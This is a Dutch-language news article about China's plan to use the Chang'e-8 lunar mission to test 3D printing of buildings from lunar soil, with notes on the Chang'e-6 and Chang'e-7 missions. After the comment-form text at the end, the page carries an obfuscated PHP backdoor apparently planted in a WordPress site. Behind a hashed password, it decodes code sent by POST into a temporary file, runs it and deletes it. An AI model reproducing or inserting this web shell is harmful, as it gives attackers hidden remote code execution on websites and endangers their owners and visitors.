Chang’e 8 om 3D-printtechnologie te testen voor het bouwen op de maan

Chinese wetenschappers zijn van plan om de Chang’e-8 maanmissie te gebruiken om de mogelijkheid te onderzoeken om 3D-printtechnologie te gebruiken om gebouwen op de maan te bouwen, volgens de belangrijkste maanprogrammaplanner van het land.

Wu Weireng , een academicus van de Chinese Academy of Engineering en een vooraanstaand wetenschapper bij de China National Space Administration, zei dat de Chang’e-8 robotsonde de derde is die op de maan wordt geïnstalleerd als onderdeel van de volgende satellietverkenning van het land. projecteren. Het is om op de zuidpool van de maan te landen om milieu- en mineraalstudies uit te voeren op de landingsplaats en om te zien of geavanceerde technologie, zoals 3D-printen, in de toekomst op het maanoppervlak kan worden gebruikt met behulp van maanmaterialen.

“Als we lang op de maan willen blijven, moeten we stations maken met lokale materialen. Maanaarde wordt onze grondstof en daar worden bouwstenen van geprint. Professoren van verschillende binnenlandse universiteiten, zoals de Tongji University in Shanghai en de Xian Jiaotong University in de provincie Shaanxi, zijn al begonnen met het onderzoeken van mogelijke toepassingen van 3D-printtechnologie op de maan”, zei hij .

China heeft een grote routekaart voor exploratieprogramma’s, zei de hoofdplanner.

Het Chang’e-6 robotvoertuig is gepland om te landen op de andere kant van de maan, vanwaar het grond- en steenmonsters zal brengen. Het Chang’e-5 ruimtevaartuig heeft al monsters afgeleverd van de nabije kant van de maan.

De Chang’e-6-sonde bestaat uit vier componenten: een orbiter, een lander, een lift en een retourmodule. De lancering is gepland in 2025. Dat meldt China Daily , een partner van het TV BRICS-netwerk.

Na Chang’e-6 zal de robotische sonde Chang’e-7 naar de zuidpool van de maan worden gestuurd om “zeer nauwkeurig onderzoek” uit te voeren. “De missie van de volgende generatie is ontworpen om naar sporen van water op de Zuidpool te zoeken, de omgeving en het weer te bestuderen en het terrein te bestuderen. Aan boord van de sonde zal een “vliegend voertuig” zijn dat de taak heeft om in gaten op het maanoppervlak te vliegen op zoek naar ijs, legt Wu Weireng uit. “Chang’e 7 zal ook worden belast met het ontdekken van natuurlijke hulpbronnen onder het oppervlak van de zuidpool van de maan. Missieontwerpers proberen te beoordelen of we de sonde kunnen gebruiken om aan de oppervlakte te graven en ondergrondse structuren en hun samenstelling te bestuderen.”

In de toekomst zullen wetenschappers componenten van de drie komende missies – orbiters, grondvoertuigen, rovers en sensoren – gebruiken om een ​​prototype van een buitenpost voor robotwetenschap te bouwen die zal dienen als een platform voor internationale samenwerking op het gebied van maanverkenning, voegde Wu eraan toe .

Leave a Reply

Your email address will not be published. Required fields are marked *if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}